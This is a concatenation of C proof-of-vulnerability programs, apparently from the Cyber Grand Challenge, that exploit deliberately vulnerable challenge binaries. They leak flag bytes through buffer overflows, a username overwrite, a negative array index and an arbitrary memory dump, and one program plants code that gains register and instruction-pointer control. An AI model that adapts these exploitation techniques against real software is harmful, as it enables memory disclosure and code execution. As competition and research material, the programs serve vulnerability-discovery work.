/*
 * Type-2 POV. Sends a 140-byte tag-structured blob (an 11-byte "HDR" header,
 * two 0x40-byte "ALBM"/"TITL" records, and a trailing 0x7f), then reads the
 * CB's "Album: ..." reply and submits four bytes from it.
 *
 * Within each record the cgc_memcpy literal below places 8 bytes of tag+length
 * and 24 filler bytes, then a 12-byte run, a 4-byte constant
 * (\x20\xc0\x47\x43 / \x30\xc0\x47\x43) and a 16-byte run. The two runs are
 * overwritten with random bytes; every offset used here is derived from that
 * layout, so the literal and the constants must change together.
 */
enum {
    POV_HDR_LEN     = 11,
    POV_REC_LEN     = 0x40,
    POV_REC_RND     = 8 + 24,            /* first random run inside a record */
    POV_RND_A_LEN   = 12,
    POV_RND_B_OFF   = POV_REC_RND + 16,  /* second run, past the 4-byte constant */
    POV_RND_B_LEN   = 16,
    POV_ALBM_OFF    = POV_HDR_LEN,
    POV_TITL_OFF    = POV_HDR_LEN + POV_REC_LEN,
    POV_PAYLOAD_LEN = 140
};

/*
 * Rewrites bytes the original treated as "bad chars" (presumably ones the CB's
 * parser would reject - not verified here): low bytes inside the two random
 * regions are XORed with 0x55, and 0x7f / 0x7e anywhere become 0x3f / 0x3e.
 * The final 0x7f at index 139 is deliberately left alone.
 */
static void scrub_payload(unsigned char *p) {
    int idx;
    for (idx = 0; idx < POV_PAYLOAD_LEN - 1; idx++) {
        int in_albm = idx >= POV_ALBM_OFF + POV_REC_RND && idx < POV_ALBM_OFF + POV_REC_LEN;
        int in_titl = idx >= POV_TITL_OFF + POV_REC_RND && idx < POV_TITL_OFF + POV_REC_LEN;
        if ((in_albm || in_titl) && p[idx] < 0x10) {
            p[idx] ^= 0x55;
        }
        if (p[idx] == 0x7f) {
            p[idx] = 0x3f;
        } else if (p[idx] == 0x7e) {
            p[idx] = 0x3e;
        }
    }
}

/*
 * Returns the first index in [7, 16) at which "Arti" starts, or 16 if absent.
 * NOTE(review): the 4-byte compare reads up to p[18], beyond the 16 bytes just
 * received, so the last three positions compare against stale buffer contents.
 * Kept as in the original.
 */
static int find_arti(const unsigned char *p) {
    int idx = 7;
    while (idx < 16 && memcmp(&p[idx], "Arti", 4) != 0) {
        idx++;
    }
    return idx;
}

int main() {
    type2_vals t2;
    unsigned char buf[200];
    size_t rnd_bytes;
    int hit;

    cgc_memcpy(buf, "\x00\xff""HDR\x05\x00\x00\x00\x01\x00" "ALBM\x00\x00\x00\x38\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b""AAAAAAAAAAAA\x20\xc0\x47\x43""CCCCAAAAAAAAAAAA" "TITL\x00\x00\x00\x38\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b""AAAAAAAAAAAA\x30\xc0\x47\x43""CCCCAAAAAAAAAAAA\x7f", POV_PAYLOAD_LEN);

    /* Randomise the two variable runs of each record. random()'s result is
     * not checked; whatever it leaves in place is sent as-is. */
    random(buf + POV_ALBM_OFF + POV_REC_RND, POV_RND_A_LEN, &rnd_bytes);
    random(buf + POV_ALBM_OFF + POV_RND_B_OFF, POV_RND_B_LEN, &rnd_bytes);
    random(buf + POV_TITL_OFF + POV_REC_RND, POV_RND_A_LEN, &rnd_bytes);
    random(buf + POV_TITL_OFF + POV_RND_B_OFF, POV_RND_B_LEN, &rnd_bytes);

    scrub_payload(buf);

    type2_negotiate(&t2);
    transmit_all(STDOUT, buf, POV_PAYLOAD_LEN);

    length_read(STDIN, buf, 0x58);  /* first 0x58 bytes of the reply are skipped */
    length_read(STDIN, buf, 16);    /* "Album: ?????????" */

    hit = find_arti(buf);
    if (hit == 16) {
        /* No "Arti" in the album line: the four bytes after "Album: " are the answer. */
        type2_submit(buf + 7, 4);
        return 0;
    }

    /* "Arti" was present: pull 8 more bytes and answer from those. */
    length_read(STDIN, buf, 8);
    type2_submit(buf + 4, 4);
    return 0;
}
int main() { unsigned char exploit[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x0c\"8N"; char admin_name[] = {12, 34, 56, 78 }; type2_vals t2; type2_negotiate(&t2); int secret = 0; unsigned char buf[200]; unsigned short msg_length = 0; unsigned short register_user_req = 11382; char user_name[] = { 11, 22, 33, 44 }; //Register first user (this user will have name overwritten) transmit_all(STDOUT, ®ister_user_req, sizeof(register_user_req)); msg_length = sizeof(user_name); transmit_all(STDOUT, &msg_length, sizeof(msg_length)); transmit_all(STDOUT, user_name, sizeof(user_name)); //Logout user unsigned short logout_req = 8719; transmit_all(STDOUT, &logout_req, sizeof(logout_req)); unsigned short login_req = 8711; //Using the login (vulnerable) command overwrite user name of first user transmit_all(STDOUT, &login_req, sizeof(login_req)); msg_length = sizeof(exploit) - 1; transmit_all(STDOUT, &msg_length, sizeof(msg_length)); transmit_all(STDOUT, exploit, sizeof(exploit) - 1); msg_length = 
sizeof(admin_name); transmit_all(STDOUT, &msg_length, sizeof(msg_length)); transmit_all(STDOUT, admin_name, sizeof(admin_name)); //Now login as the administrator transmit_all(STDOUT, &login_req, sizeof(login_req)); msg_length = sizeof(admin_name); transmit_all(STDOUT, &msg_length, sizeof(msg_length)); transmit_all(STDOUT, admin_name, sizeof(admin_name)); msg_length = sizeof(admin_name); transmit_all(STDOUT, &msg_length, sizeof(msg_length)); transmit_all(STDOUT, admin_name, sizeof(admin_name)); unsigned short remote_token_req = 7777; unsigned short page_idx = 100; transmit_all(STDOUT, &remote_token_req, sizeof(remote_token_req)); transmit_all(STDOUT, &page_idx, sizeof(page_idx)); unsigned short exit_server = 9999; transmit_all(STDOUT, &exit_server, sizeof(exit_server)); length_read(STDIN, buf, 24); length_read(STDIN, (unsigned char *)(&secret), sizeof(secret)); type2_submit((unsigned char *)(&secret), sizeof(secret)); return 0; }
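/*
 * Type-2 POV for a screen-driven CB. Drives the menu ("l23k", sixty-four "0"
 * lines, "shuf", "4986", "4", "dupr"), parses the integer that follows ':' on
 * the second-to-last screen line, and submits it XORed with 0x14/0x15/0x16/0x17
 * (the mask is taken from the original constants; its meaning is not visible here).
 *
 * Returns 0 after submitting, 1 if the screen could not be parsed (fewer than
 * two lines, or no ':' on the line) - the original dereferenced NULL / indexed
 * ScreenBuf[LineCnt - 2] with an unsigned underflow in those cases.
 */
int main() {
    type2_vals t2v;
    unsigned char *ScreenBuf[MAX_LINES];
    unsigned LineCnt;

#ifndef DEBUG
    type2_negotiate(&t2v);
#else
    (void)t2v;
#endif

    transmit_all(STDOUT, "l23k", 4);
    send_string(STDERR, "GOING\n");
    LineCnt = ReadScreen(ScreenBuf);

    for (unsigned Index = 0; Index < 64; ++Index) {
        send_string(STDERR, "LOOP\n");
        send_string(STDOUT, "0\n");
        LineCnt = ReadScreen(ScreenBuf);
    }

    send_string(STDOUT, "shuf\n");
    LineCnt = ReadScreen(ScreenBuf);
    send_string(STDOUT, "4986\n");
    LineCnt = ReadScreen(ScreenBuf);
    send_string(STDOUT, "4\n");
    LineCnt = ReadScreen(ScreenBuf);
    send_string(STDOUT, "dupr\n");
    LineCnt = ReadScreen(ScreenBuf);

    /* LineCnt is unsigned: LineCnt - 2 wraps when fewer than two lines came back. */
    if (LineCnt < 2) {
        send_string(STDERR, "short screen\n");
        send_string(STDOUT, "quit\n");
        return 1;
    }

    char *s = (char *)ScreenBuf[LineCnt - 2];
    char *colon = strchr(s, ':');
    /* The value is expected two characters past the colon (": <number>");
     * guard against a missing colon or a line ending right after it. */
    if (colon == NULL || colon[1] == '\0') {
        send_string(STDERR, "no value on screen line\n");
        send_string(STDOUT, "quit\n");
        return 1;
    }
    s = colon + 2;

    int m = (int)strtol(s, NULL, 10);
    unsigned char secret[4];
    cgc_memcpy(secret, (void *)&m, 4);
    secret[0] ^= 0x14;
    secret[1] ^= 0x15;
    secret[2] ^= 0x16;
    secret[3] ^= 0x17;

    send_string(STDERR, (char *)s);
    send_string(STDERR, "----->\n");
    type2_submit((unsigned char *)secret, 4);
    send_string(STDOUT, "quit\n");
    return 0;
}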
/*
 * Type-2 POV: after negotiation the four flag bytes are fetched one at a time
 * with get_byte(i), submitted, and the CB is told to quit.
 */
int main(void) {
    unsigned char flag[4] = {0};
    unsigned int idx = 0;

    negotiate_type2();

    while (idx < sizeof(flag)) {
        flag[idx] = get_byte(idx);
        idx++;
    }

    type2_submit(flag, sizeof(flag));
    transmit_all(STDOUT, "quit\n", sizeof("quit\n") - 1);
    return 0;
}
/*
 * Type-2 POV. Reads the CB's 10-byte greeting, sends one "ish" command line
 * whose dump argument is the decimal constant 1128775680 (0x43470000 - appears
 * to be inside the CGC flag-page range, not verified here), then "quit", and
 * submits the first 4 bytes of what comes back.
 *
 * The original carried a commented-out print_integer(bytes + 42,
 * t2vals.region_addr): offset 42 is where the decimal argument starts, so the
 * address was once meant to come from the negotiated region instead of being
 * hard-coded.
 */
int main(void) {
    type2_vals t2vals;
    char input[11];
    static const char dump_cmd[] = "ish hostname +p password +l username dump 1128775680 \n";
    unsigned int leaked = 0xffffffff;   /* sentinel if the read returns nothing */

    type2_negotiate(&t2vals);

    ReceiveFromCB(input, 10);

    /* sizeof - 1 excludes the terminating NUL; identical to cgc_strlen here. */
    SendToCB((char *)dump_cmd, sizeof(dump_cmd) - 1);
    SendToCB("quit\n", 5);

    ReceiveFromCB((char *)&leaked, 4);
    type2_submit((unsigned char *)&leaked, 4);
    return 0;
}
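/* Stores a 32-bit value at an arbitrary byte offset in host byte order.
 * Replaces the original *(unsigned int *)&buf[n] stores, which alias a char
 * array as unsigned int; memcpy has the same bytes-on-the-wire result on the
 * CGC x86 target without the strict-aliasing hazard. */
static void put_u32(unsigned char *dst, unsigned int value) {
    cgc_memcpy(dst, &value, sizeof(value));
}

/*
 * Type-1 POV. Negotiates ip/reg masks of 0x00ffffff (low 24 bits chosen by
 * the framework) and fills the high byte with 0x91 on both values, then sends
 * a 79-byte request: a 40-byte header followed by 39 bytes of code. Two 4-byte
 * immediates inside that code (buf[49..52] and buf[60..63]) are patched with
 * the negotiated ipval and regval after the copy.
 *
 * NOTE(review): the original comment named the gadget 0x90000101, but the
 * last immediate in the code bytes is \x05\x01\x00\x90, i.e. 0x90000105 -
 * confirm which one is intended.
 */
int main(int cgc_argc, char *cgc_argv[]) {
    unsigned char buf[128];
    type1_vals t1;

    (void)cgc_argc;
    (void)cgc_argv;

    cgc_type1_negotiate(0x00ffffff, 0x00ffffff, 5, &t1);
    t1.ipval |= 0x91000000;
    t1.regval |= 0x91000000;

    /* Query header; field meanings are not visible here. */
    put_u32(&buf[0], 36 + 39);
    put_u32(&buf[4], 0x367bae4d);
    /* "exe" record */
    put_u32(&buf[8], 0x4E269472);
    put_u32(&buf[12], 0x2000);
    put_u32(&buf[16], 0x2000);
    put_u32(&buf[20], 39);          /* length of the code that follows */
    put_u32(&buf[24], 0x2020);
    put_u32(&buf[28], 0);
    put_u32(&buf[32], 0x2020);
    put_u32(&buf[36], 0);

    /* 39 bytes of code; placeholders 0x42424242 / 0x41414141 are patched below. */
    cgc_memcpy(&buf[40], "\x81\xec\x94\x80\x01\x00\xc7\x04\x24\x42\x42\x42\x42\x4c\x4c\x4c\x4c\xc7\x04\x24\x41\x41\x41\x41\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\xc7\x04\x24\x05\x01\x00\x90", 39);

    /* Patch the two immediates with the negotiated ip and register values. */
    put_u32(&buf[49], t1.ipval);
    put_u32(&buf[60], t1.regval);

    cgc_transmit_all(STDOUT, buf, 40 + 39);
    cgc_length_read(STDIN, buf, 4);
    return 0;
}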
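/*
 * Type-2 POV. Registers as "charlie", subscribes to itself, starts a "blub"
 * whose body carries the 4-byte value 0x4347c010, reads blubs back, and from
 * the address leaked in the reply computes a negative index that is sent in a
 * "y" command. The secret then arrives after 336 bytes of reply and is submitted.
 *
 * Fixes relative to the original:
 *  - tosend was never initialised before strcat(), so the first strcat
 *    searched uninitialised stack for a NUL (undefined behaviour); it now
 *    starts as an empty string.
 *  - the leaked address is read with memcpy instead of *(size_t*)buf, avoiding
 *    a misaligned / aliasing access. Same bytes, same value.
 *
 * client_0_data and the +44 / (2 << 29) arithmetic are taken from the
 * original; their derivation is not visible here.
 */
int main(void) {
#ifndef DEBUG
    xlat_seed("9an538n9av3;5");
#endif
    char buf[1024];
    int secrets = 0x4347c010;
    const char *reg = "charlie" EOT_S;
    const char *sub_self = "s" EOT_S "charlie" EOT_S;
    const char *start_blub = "b" EOT_S;
    const char *read_blubs = "r" EOT_S;

    length_read(0, (unsigned char *)buf, 0x4);

#ifndef TESTING
    unsigned char data[4];
    type2_vals t2;
    type2_negotiate(&t2);
#endif

    send_string(1, reg);
    length_read(0, (unsigned char *)buf, 0x4);
    send_string(1, sub_self);
    send_string(1, start_blub);
    send_string(1, "adf");
    transmit_all(1, &secrets, sizeof(secrets));
    send_string(1, EOT_S);
    send_string(1, read_blubs);

    length_read(0, (unsigned char *)buf, 0x30);
    length_read(0, (unsigned char *)buf, 0x4);

#ifndef DEBUG
    size_t client_0_data = 0xb7e004f8;
#else
    size_t client_0_data = 0xb7e000b8;
#endif

    /* The 4 bytes just read are a pointer; take it out of buf without aliasing. */
    size_t leaked_ptr;
    memcpy(&leaked_ptr, buf, sizeof(leaked_ptr));
    size_t secret_addr = leaked_ptr + 44;
    int diff = secret_addr - client_0_data;
    diff /= 4;
    int idx = (2 << 29) - diff;
    _convert_signed(buf, -idx, 10, 0);   /* decimal text of -idx, written into buf */

    /* "y" <EOT> "charlie" <EOT> <index> <EOT> */
    char tosend[1024] = "";
    strcat(tosend, "y");
    strcat(tosend, EOT_S);
    strcat(tosend, "charlie");
    strcat(tosend, EOT_S);
    strcat(tosend, buf);
    strcat(tosend, EOT_S);
    send_string(1, tosend);
    send_string(1, read_blubs);

    const char *cgc_exit = "e" EOT_S;
    send_string(1, cgc_exit);

#ifndef TESTING
    length_read(0, (unsigned char *)buf, 336);
    length_read(0, data, 4);
    type2_submit(data, 4);
#endif
    return 0;
}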
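/*
 * Plays game #2 ("guess the number") against the CB and submits the final guess.
 *
 * scored_game != 0: ordinary game - max value "0" (default 65535), 16 guesses,
 *   binary search over [0, 0xffff].
 * scored_game == 0: POV path - answer "-1" to the max-value prompt. If the CB
 *   re-prompts (first byte 'E' of "Enter max value"), fall back to the ordinary
 *   game; otherwise two reply lines are consumed and the search runs over the
 *   full int range with 33 guesses.
 *
 * Returns 1 after type2_submit of the guess, 0 if the CB answered "Sorry"
 * (or if the guess buffers could not be allocated).
 *
 * Fixes relative to the original: guess_msg/guess_buf are checked after
 * malloc() and freed on every return path; a NULL resp from delimited_read no
 * longer reaches memcmp(). resp itself is not freed - its ownership contract
 * is not visible here (TODO confirm whether delimited_read allocates per call).
 */
int play_hi_lo(int scored_game) {
    unsigned char len_resp[128];
    unsigned int resp_len = 0;
    unsigned char *resp = NULL;
    char *select_guess_num_game = "2\n";
    char *pov_guess_num = "-1\n";
    char *normal_guess_num = "0\n";
    int num_guesses = 33;
    int guess_lower = -2147483647;
    int guess_upper = 2147483647;
    int guess = 0;
    int won = 0;
    int result = 0;

    char *guess_msg = malloc(128);
    char *guess_buf = malloc(128);
    if (guess_msg == NULL || guess_buf == NULL) {
        free(guess_msg);
        free(guess_buf);
        return 0;
    }

    if (scored_game) {
        pov_guess_num = normal_guess_num;
        num_guesses = 16;
        guess_upper = 0xffff;
        guess_lower = 0;
        guess = (guess_upper - guess_lower) / 2;
    }

    read_until_game_prompt();
    length_read(STDIN, len_resp, cgc_strlen("Game # "));
    transmit_all(STDOUT, select_guess_num_game, cgc_strlen(select_guess_num_game));
    length_read(STDIN, len_resp, cgc_strlen("Enter max value (Default=65535): "));
    transmit_all(STDOUT, pov_guess_num, cgc_strlen(pov_guess_num));

    if (!scored_game) {
        length_read(STDIN, len_resp, 1);
        if (len_resp[0] == 'E') {
            /* CB rejected -1 and re-prompted: play the ordinary game instead. */
            length_read(STDIN, len_resp, cgc_strlen("nter max value (Default=65535): "));
            transmit_all(STDOUT, normal_guess_num, cgc_strlen(normal_guess_num));
            num_guesses = 16;
            guess_upper = 0xffff;
            guess_lower = 0;
            guess = (guess_upper - guess_lower) / 2;
        } else {
            delimited_read(STDIN, &resp, &resp_len, (unsigned char *)"\n", 1);
            delimited_read(STDIN, &resp, &resp_len, (unsigned char *)"\n", 1);
            num_guesses = 33;
        }
    }

    while (num_guesses) {
        cgc_memset(guess_buf, 0, 128);
        cgc_memset(guess_msg, 0, 128);
        cgc_memset(len_resp, 0, 128);
        sprintf(guess_buf, "%d\n", guess);
        sprintf(guess_msg, "Guess the number [%d guesses left]: ", num_guesses--);
        length_read(STDIN, len_resp, cgc_strlen(guess_msg));
        transmit_all(STDOUT, guess_buf, cgc_strlen(guess_buf));
        delimited_read(STDIN, &resp, &resp_len, (unsigned char *)"\n", 1);
        if (resp == NULL) {
            break;
        }
        /* Binary search: the bound that the CB rejected moves to the current guess. */
        if (memcmp(resp, "Too Low", 7) == 0) {
            guess_lower = guess;
            guess += (guess_upper - guess_lower) / 2;
        } else if (memcmp(resp, "Too High", 8) == 0) {
            guess_upper = guess;
            guess -= (guess_upper - guess_lower) / 2;
        } else if (memcmp(resp, "You won!", 8) == 0) {
            won = 1;
            break;
        }
    }

    if (!won) {
        delimited_read(STDIN, &resp, &resp_len, (unsigned char *)"\n", 1);
        if (resp == NULL || memcmp(resp, "Sorry", 5) == 0) {
            goto out;
        }
    }

    /* POV: the guess (winning, or final if the CB did not say "Sorry") is the answer. */
    type2_submit((void *)&guess, sizeof(int));
    result = 1;

out:
    free(guess_msg);
    free(guess_buf);
    return result;
}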
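/* Sends one chunk through append_buf()/transmit_all() exactly as the generated
 * original did, but skips transmit_all when append_buf returned NULL. */
static void send_chunk(unsigned char *src, unsigned int src_len) {
    unsigned int out_len = 0;
    unsigned char *out = append_buf(NULL, &out_len, src, src_len);
    if (out != NULL && out_len > 0) {
        transmit_all(1, out, out_len);
    }
    free(out);
}

/* Allocates len bytes and fills them with length_read(); returns NULL on
 * allocation failure (the original passed a NULL malloc result straight to
 * length_read). length_read's return value is ignored as in the original. */
static unsigned char *recv_exact(unsigned int len) {
    unsigned char *data = malloc(len);
    if (data == NULL) {
        return NULL;
    }
    (void)length_read(0, data, len);
    return data;
}

/*
 * Generated-style type-2 POV. Three 4-byte writes drive the CB; the flag's
 * first three bytes come from the 3-byte reply to the first write ("stamp0")
 * and its fourth byte from the first byte of the reply to the second write
 * ("stamp1"). Each data reply is followed by a 2-byte acknowledgement that is
 * checked with data_match() (its behaviour on mismatch is not visible here).
 * The assign_from_slice() calls are retained from the original.
 *
 * Returns 1 if a receive buffer could not be allocated, 0 otherwise.
 */
int main(void) {
    static unsigned char write_a[] = "\x03\x03\x03\x03";
    static unsigned char write_b[] = "\x03\x03\x03\x03";
    static unsigned char write_c[] = "\x00\x0f\xf0\xff";
    static unsigned char ack_a[] = "\x04\x04";
    static unsigned char ack_b[] = "\x04\x04";
    static unsigned char ack_c[] = "\x04\x17";
    unsigned char flag[4] = {0, 0, 0, 0};
    unsigned char *reply;

    negotiate_type2();

    /* Write #1 -> 3-byte "stamp0" (flag[0..2]) + 2-byte ack. */
    send_chunk(write_a, 4);
    reply = recv_exact(3);
    if (reply == NULL) {
        return 1;
    }
    for (int i = 0; i < 3; i++) {
        flag[i] = reply[i];
    }
    assign_from_slice("stamp0", reply, 3, 0, 3, 0);
    free(reply);

    reply = recv_exact(2);
    if (reply == NULL) {
        return 1;
    }
    data_match(reply, 2, ack_a, 2);
    free(reply);

    /* Write #2 -> 3-byte "stamp1" (flag[3] from its first byte) + 2-byte ack. */
    send_chunk(write_b, 4);
    reply = recv_exact(3);
    if (reply == NULL) {
        return 1;
    }
    flag[3] = reply[0];
    assign_from_slice("stamp1", reply, 3, 0, 3, 0);
    free(reply);

    reply = recv_exact(2);
    if (reply == NULL) {
        return 1;
    }
    data_match(reply, 2, ack_b, 2);
    free(reply);

    /* Write #3 -> 2-byte ack only. */
    send_chunk(write_c, 4);
    reply = recv_exact(2);
    if (reply == NULL) {
        return 1;
    }
    data_match(reply, 2, ack_c, 2);
    free(reply);

    type2_submit(flag, 4);
    return 0;
}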
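/*
 * Deliberately fails the type-2 POV: submits four bytes that are not expected
 * to be the answer, then terminates with status -1.
 *
 * The original submitted an uninitialised 4-byte array, which is undefined
 * behaviour; the bytes are now explicitly zero so the submission is a defined
 * (still wrong) value.
 */
void fail() {
    unsigned char x[4] = {0, 0, 0, 0};
    type2_submit(x, 4);
    _terminate(-1);
}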